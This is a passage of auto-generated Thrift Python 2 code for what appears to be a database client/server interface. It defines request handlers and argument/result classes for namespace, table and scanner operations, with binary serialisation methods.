def process_get_tables(self, seqid, iprot, oprot):
args = get_tables_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_tables_result()
try:
result.success = self._handler.get_tables(args.ns)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_tables", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_listing(self, seqid, iprot, oprot):
args = get_listing_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_listing_result()
try:
result.success = self._handler.get_listing(args.ns)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_listing", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_table_splits(self, seqid, iprot, oprot):
args = get_table_splits_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_table_splits_result()
try:
result.success = self._handler.get_table_splits(args.ns, args.table_name)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_table_splits", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_drop_namespace(self, seqid, iprot, oprot):
args = drop_namespace_args()
args.read(iprot)
iprot.readMessageEnd()
result = drop_namespace_result()
try:
self._handler.drop_namespace(args.ns, args.if_exists)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("drop_namespace", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_rename_table(self, seqid, iprot, oprot):
args = rename_table_args()
args.read(iprot)
iprot.readMessageEnd()
result = rename_table_result()
try:
self._handler.rename_table(args.ns, args.name, args.new_name)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("rename_table", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_drop_table(self, seqid, iprot, oprot):
args = drop_table_args()
args.read(iprot)
iprot.readMessageEnd()
result = drop_table_result()
try:
self._handler.drop_table(args.ns, args.name, args.if_exists)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("drop_table", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class create_namespace_args:
"""
Attributes:
- ns
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'ns', None, None, ), # 1
)
def __init__(self, ns=None,):
self.ns = ns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ns = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_namespace_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.STRING, 1)
oprot.writeString(self.ns)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class create_namespace_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_namespace_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class create_table_args:
"""
Attributes:
- ns
- table_name
- schema
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRING, 'schema', None, None, ), # 3
)
def __init__(self, ns=None, table_name=None, schema=None,):
self.ns = ns
self.table_name = table_name
self.schema = schema
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.schema = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_table_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.schema != None:
oprot.writeFieldBegin('schema', TType.STRING, 3)
oprot.writeString(self.schema)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class create_table_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('create_table_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class open_namespace_args:
"""
Attributes:
- ns
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'ns', None, None, ), # 1
)
def __init__(self, ns=None,):
self.ns = ns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ns = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('open_namespace_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.STRING, 1)
oprot.writeString(self.ns)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class open_namespace_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('open_namespace_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class close_namespace_args:
"""
Attributes:
- ns
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
)
def __init__(self, ns=None,):
self.ns = ns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('close_namespace_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class close_namespace_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('close_namespace_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class open_scanner_args:
"""
Attributes:
- ns
- table_name
- scan_spec
- retry_table_not_found
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
(3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ), # 3
(4, TType.BOOL, 'retry_table_not_found', None, False, ), # 4
)
def __init__(self, ns=None, table_name=None, scan_spec=None, retry_table_not_found=thrift_spec[4][4],):
self.ns = ns
self.table_name = table_name
self.scan_spec = scan_spec
self.retry_table_not_found = retry_table_not_found
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.scan_spec = ScanSpec()
self.scan_spec.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.BOOL:
self.retry_table_not_found = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('open_scanner_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
if self.scan_spec != None:
oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
self.scan_spec.write(oprot)
oprot.writeFieldEnd()
if self.retry_table_not_found != None:
oprot.writeFieldBegin('retry_table_not_found', TType.BOOL, 4)
oprot.writeBool(self.retry_table_not_found)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class open_scanner_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('open_scanner_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class close_scanner_args:
"""
Attributes:
- scanner
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'scanner', None, None, ), # 1
)
def __init__(self, scanner=None,):
self.scanner = scanner
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.scanner = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('close_scanner_args')
if self.scanner != None:
oprot.writeFieldBegin('scanner', TType.I64, 1)
oprot.writeI64(self.scanner)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class close_scanner_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('close_scanner_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_cells_args:
"""
Attributes:
- scanner
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'scanner', None, None, ), # 1
)
def __init__(self, scanner=None,):
self.scanner = scanner
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.scanner = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_cells_args')
if self.scanner != None:
oprot.writeFieldBegin('scanner', TType.I64, 1)
oprot.writeI64(self.scanner)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_cells_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype49, _size46) = iprot.readListBegin()
for _i50 in xrange(_size46):
_elem51 = Cell()
_elem51.read(iprot)
self.success.append(_elem51)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_cells_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter52 in self.success:
iter52.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_cells_as_arrays_args:
"""
Attributes:
- scanner
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'scanner', None, None, ), # 1
)
def __init__(self, scanner=None,):
self.scanner = scanner
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.scanner = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_cells_as_arrays_args')
if self.scanner != None:
oprot.writeFieldBegin('scanner', TType.I64, 1)
oprot.writeI64(self.scanner)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_cells_as_arrays_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype56, _size53) = iprot.readListBegin()
for _i57 in xrange(_size53):
_elem58 = []
(_etype62, _size59) = iprot.readListBegin()
for _i63 in xrange(_size59):
_elem64 = iprot.readString();
_elem58.append(_elem64)
iprot.readListEnd()
self.success.append(_elem58)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('next_cells_as_arrays_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.LIST, len(self.success))
for iter65 in self.success:
oprot.writeListBegin(TType.STRING, len(iter65))
for iter66 in iter65:
oprot.writeString(iter66)
oprot.writeListEnd()
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class next_cells_serialized_args:
"""
Attributes:
- scanner
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'scanner', None, None, ), # 1
)
def __init__(self, scanner=None,):
self.scanner = scanner
